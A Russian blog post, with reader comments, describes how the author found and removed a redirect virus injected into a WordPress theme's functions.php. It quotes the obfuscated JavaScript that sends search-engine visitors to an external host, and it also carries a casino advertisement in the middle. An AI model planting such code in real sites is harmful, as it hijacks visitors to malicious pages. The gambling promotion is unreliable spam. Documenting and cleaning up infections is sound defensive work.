Владимир Вокстермен

Здравствуйте!

А вы знали, что ваш сайт wordpress могут заразить вирусы? Вот и я знал, но как-то мало обращал на это внимание. Ну кому нужен мой скромный сайт с огромным потенциалом, зачем все эти махи… Стоп, точно, у моего сайта — огромный потенциал, совсем из головы вылетело… Как и большая часть страниц из поиска yandex.

Да, What The Fuck, что за biohazard рядом с названием моего сайта!? Оказывается, мой сайт на wordpress заражен вирусом и его надо срочно взбадривать. А то 9, 8, 7…

вирус на сайте wordpress

Уважаемый Платон Щукин помог мне письмом, в котором указал код начинающийся:

«[script language=»JavaScript»]eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!».replace(/^/,String)){while(c—)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c—)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘o r=a.e,t=»»,q;5(r.4(«m.»)!=-1)t=»q»;5(r.4(«b.»)!=-1)t=»q»;5(r.4(«c.»)!=-1)t=»p»;5(r.4(«f.»)!=»;5(r.4(«i.»)!=-1)t=»q»;5(t.6&&((q=r.4(«?»+t+»=»))!=-1||(q=r.4(«&»+t+»=»))!=-1))j.k=»l://9″+»1.»+»n»+»3″+».»+»8″+»9.1″+»s/»+»u.p»+»v?w»+»d=7&t»+»x»+»y=»+r.z(q+2+t.6).A(«&»)[0];’,37,37,’||||indexOf|if|length|||2||go|hp|si|er|ms|substring|split’.split(‘|’),0,{}))[/script]

Скобки в тегах изменены во избежание случайного срабатывания кода.»

Также, Яндекс выдал мне страницы, где прячется JS/RefC-Gen. От него и пришлось лечить сайта. От этой гадины, на которую я потратил целый час своей замечательной жизни. Просмотрев исходный код нужных страниц, я действительно увидел похожий код. Остался вопрос: а как же его найти и удалить?

Для этого я скачал все папки и файлы с хостинга на ПК, предварительно проверив его на вирусы, и выбрал поиск по папкам, чтобы найти нужную строчку кода. Для этого подойдет Total Commander, например.

спасти сайт wordpress от scounter

Вирус назывался scounter, но скорее всего, это один из «псевдонимов» JS/RefC-Gen. Почему назывался? Потому что он был найден и обезврежен. В файле functions.php моей темы.

найти код scountera

Найти и вылечить, удалить вирус на сайте wordpress оказалось делом несложным, если знать, где именно вредный код искать.

Осталось чуть-чуть подождать результатов проверки роботом и снова мой сайт вернется на вершину или поближе к вершине, он-то у меня перспективный.:)

Успехов! Найти и удалить вам вирус на wordpress. А лучше не встречаться с этой заразой. Все будет хорошо!

удалить вирус сайта

Хотите весело провести время в интернете и при этом немного заработать? Тогда лучшие интернет казино рунета к вашим услугам. Ресистрируйтесь и получайте самые привлекательные бонусы казино даже без депозита. Испытай удачу!

Поставьте оценку автору!

Для меня это невероятно важно, а у вас займёт всего лишь один клик.

УжасноПлохоСреднеХорошоОлтично! (5 оценок)
Как найти и удалить вирус с сайта wordpress. Антивирус wordpress
Загрузка...
48 Комментариев
  1. Саша
    18.07.2015 at 14:08

    А я ставлю end в конце основного скрипта и мне пока это помогало, вирус дописывается дальше.

    • ushi
      29.07.2015 at 18:22

      Немного не понимаю, что есть основной скрипт.

  2. Марина
    24.12.2014 at 15:35

    Здравствуйте! Установила тему и антивирус нашел create_function Не подскажите вредоносный это код?

    • ushi
      19.06.2015 at 18:24

      Честно говоря не сталкивался.

  3. Марина
    29.11.2014 at 03:13

    Здравствуйте! Установила счетчик от bigmir)net TOP 100 и плагин антивирус начал ругаться на строчку в счетчике else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFla Подскажите можно спокойно ставить что это не вирус? Заранее спасибо!

    • ushi
      02.12.2014 at 05:50

      Здравствуйте, Марина! Не думаю, что код счетчика, который установлен на многих сайтах, будет содержать в себе вирусы.
      Если все же вас это беспокоит, можно установить другой счетчик.

  4. Ram
    24.11.2014 at 18:48

    Я долго не думаю при обнаружении вируса на сайте. Просто, переустанавливаю wordpress. Именно, переустанавливаю. При обновлении вирусы остаются. Обычно, заражение идет с вирусного браузера при редактировании сайта.

    • ushi
      24.11.2014 at 19:33

      Интересная версия. Вирусы могут также идти из «пиратских» плагинов и тем.

  5. Игорь Артамонов
    19.12.2013 at 18:39

    Спасибо за статью ! Зачет на картинке

    • ushi
      01.11.2014 at 17:07

      Не за что. Пользуйтесь и смотрите на здоровье!

  6. Анна
    28.08.2013 at 23:38

    После сигнала о вирусах на моем сайте, проверяла его различными сервисами, вроде ничего серьезного. А уважаемый Платон прислал подсказку: «при проверке Вашего сайта наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на следующий вредоносный ресурс: gettouch (с хвостом biz) при посещении сайта с мобильных устройств». Правда, мне пока это мало помогло, думаю, где ж его искать…

    • Людмила
      ЛюдмилаОтветить
      24.10.2014 at 17:43

      У меня та же беда. Напишите,если найдете решение.

Добавить комментарий

Ваше сообщение*

Имя*
Email*
Сайт